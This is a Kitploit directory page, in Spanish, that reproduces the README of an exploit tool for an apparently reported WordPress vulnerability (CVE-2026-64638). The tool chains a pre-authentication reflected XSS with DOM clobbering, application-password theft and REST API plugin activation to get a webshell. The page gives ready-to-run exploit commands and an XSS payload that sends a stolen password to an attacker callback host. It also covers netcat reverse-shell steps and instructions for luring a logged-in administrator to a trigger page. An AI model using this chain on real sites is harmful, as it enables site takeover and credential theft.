Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
XSS2Shell-CVE-2026-64638 — CVE-2026-64638 — XSS Reflejado Pre-Autenticación de WordPress → RCE mediante DOM Clobbering + Robo de Contraseñas de Aplicación + Activación de Plugins vía API REST. PoC de doble modo (cadena XSS y directo). | Kitploit
Herramientas/GitHubGitHub/jendmaoul/xss2shell-cve-2026-64638
ExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónSeguridad WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubjendmaoul/xss2shell-cve-2026-64638

XSS2Shell-CVE-2026-64638

CVE-2026-64638 — XSS Reflejado Pre-Autenticación de WordPress → RCE mediante DOM Clobbering + Robo de Contraseñas de Aplicación + Activación de Plugins vía API REST. PoC de doble modo (cadena XSS y directo).

Ver RepositorioSitio web
148hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-64638 — XSS2Shell

WordPress XSS Reflejado Pre-Auth → Cadena de Ejecución Remota de Código

DOM Clobbering + Robo de Contraseñas de Aplicación + Activación de Plugins vía API REST = RCE Completo

Python CVE License


⚡ Resumen

CVE-2026-64638 es un XSS Reflejado pre-autenticación crítico en wp-login.php de WordPress. La vulnerabilidad existe porque el mensaje de error de inicio de sesión refleja el nombre de usuario enviado sin una codificación HTML adecuada, lo que permite DOM Clobbering mediante <area id=ajaxurl> para evadir la mayoría de los filtros.

Cuando se encadena con la función de Contraseñas de Aplicación de WordPress, este XSS se convierte en un vector de Ejecución Remota de Código completa: cero interacción del usuario más allá de visitar una página de activación manipulada mientras tiene la sesión iniciada.

Cadena de Ataque

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│  [1] XSS (Reflected)                                            │
│      wp-login.php reflects <area id=ajaxurl> in username error   │
│                          ↓                                       │
│  [2] DOM Clobbering                                             │
│      <area id=ajaxurl> hijacks wp-admin JS → auto-submits form   │
│                          ↓                                       │
│  [3] Application Password Theft                                 │
│      XSS redirects victim to authorize-application.php           │
│      success_url callback captures app password                  │
│                          ↓                                       │
│  [4] REST API Plugin Activation                                 │
│      App password → Basic Auth → wp-json/wp/v2/plugins → active  │
│                          ↓                                       │
│  [5] Webshell RCE                                               │
│      Plugin PHP webshell → uid=33(www-data)                      │
│      Reverse shell also available                                │
└─────────────────────────────────────────────────────────────────┘

🎯 Versiones Afectadas

VersiónEstadoNotas
WordPress ≤ 6.9.5✅ VulnerableLas imágenes Docker anteriores al backport siguen siendo explotables
WordPress 6.9.6+⚠️ Parcheado (backport del 7 de agosto de 2026)Las imágenes Docker reconstruidas después del 7 de agosto incluyen el parche
WordPress 7.0.x✅ VulnerableConfirmado en 7.0.2
WordPress 7.1+❓ DesconocidoNo probado

📦 Requisitos

root@kitploit:~
pip3 install requests

Eso es todo. La biblioteca estándar de Python 3.8+ para todo lo demás.


🚀 Uso

Inicio Rápido

root@kitploit:~
# Clone
git clone https://github.com/linuxhackingid/XSS2Shell-CVE-2026-64638.git
cd XSS2Shell-CVE-2026-64638

# Auto mode (recommended)
python3 poc_fixed_v2.py --mode auto -u USER -p PASS --lhost YOUR_IP http://target.com

Modo 1: Auto (detecta y elige el mejor modo)

root@kitploit:~
python3 poc_fixed_v2.py -u admin -p password123 --lhost 192.168.1.100 http://target.com
  • Detecta si XSS es posible → usa la cadena XSS
  • Recurre al modo de credenciales directas si XSS está parcheado

Modo 2: Cadena XSS (¡no se necesitan credenciales!)

root@kitploit:~
# Terminal 1: Run the exploit (starts callback server)
python3 poc_fixed_v2.py --mode xss --lhost 192.168.1.100 http://target.com

# Terminal 2: Host the trigger page
cd /path/to/XSS2Shell-CVE-2026-64638
python3 -m http.server 8000

# Send victim: http://192.168.1.100:8000/trigger_target.com.html

La víctima debe haber iniciado sesión en WordPress como administrador. La página de activación:

  1. Envía automáticamente el payload XSS a wp-login.php mediante un iframe oculto
  2. Abre authorize-application.php para que la víctima lo apruebe
  3. Captura la Contraseña de Aplicación a través del servidor de callback
  4. La usa contra la API REST para activar el plugin webshell

Modo 3: Directo (se necesitan credenciales)

root@kitploit:~
python3 poc_fixed_v2.py --mode direct -u admin -p password123 http://target.com

Inicio de sesión directo → subida de plugin → webshell instantánea. No se requiere XSS.

Reverse Shell

root@kitploit:~
# In one terminal
nc -lvnp 4444

# In another — the exploit auto-triggers reverse shell when --lhost is set
python3 poc_fixed_v2.py --mode direct -u admin -p pass --lhost 192.168.1.100 --lport 4444 http://target.com

O manualmente a través del webshell:

root@kitploit:~
curl 'http://target.com/wp-content/plugins/xss2shell/xss2shell.php?rev=YOUR_IP:4444'

📂 Archivos

root@kitploit:~
XSS2Shell-CVE-2026-64638/
├── poc_fixed_v2.py              # Main exploit script (dual-mode)
├── poc.py                       # Original PoC (for reference)
├── trigger_192.168.0.87.html    # Example trigger page
└── README.md                    # This file

🔬 Detalles Técnicos

El Payload XSS

root@kitploit:~
< area id=ajaxurl shape=default href="http://attacker:9090/collect" >
<button id="wp-auth-check" onclick="window.ajaxurl='http://attacker:9090/collect'">x</button>

Por qué funciona:

  • La función sanitize_user() de WordPress elimina las etiquetas HTML estándar, pero no detecta <area> con un espacio inicial
  • El <area id=ajaxurl> realiza DOM Clobbering: secuestra window.ajaxurl utilizado por el JavaScript de wp-admin
  • El intervalo de wp_auth_check se dispara y el XSS redirige a la víctima a authorize-application.php
  • El parámetro success_url envía la contraseña generada al servidor de callback del atacante

Post-Explotación

Una vez capturada la Contraseña de Aplicación:

  • API REST: Autenticarse como la víctima contra /wp-json/wp/v2/
  • Activación de Plugins: POST /wp-json/wp/v2/plugins/{slug} con {"status":"active"}
  • Webshell: Acceder a wp-content/plugins/xss2shell/xss2shell.php?cmd=COMMAND
  • Reverse Shell: ?rev=IP:PORT lanza /bin/sh -i de vuelta al atacante

✅ Verificado En

ObjetivoVersiónModoResultado
Docker (local)WordPress 7.0.2Cadena XSS✅ RCE como www-data
Docker (local)WordPress 7.0.2Directo✅ RCE como www-data
Docker (local)WordPress 6.7Cadena XSS✅ RCE como www-data

⚠️ Descargo de Responsabilidad

Esta herramienta es solo para pruebas de seguridad autorizadas e investigación. Los autores no asumen ninguna responsabilidad por el mal uso. Obtenga siempre permiso por escrito antes de realizar pruebas.


📝 Créditos

  • Desarrollo del PoC: linuxhackingid
  • CVE: CVE-2026-64638

"Sin exploit, no hay informe." — Metodología Shannon

Descargar herramienta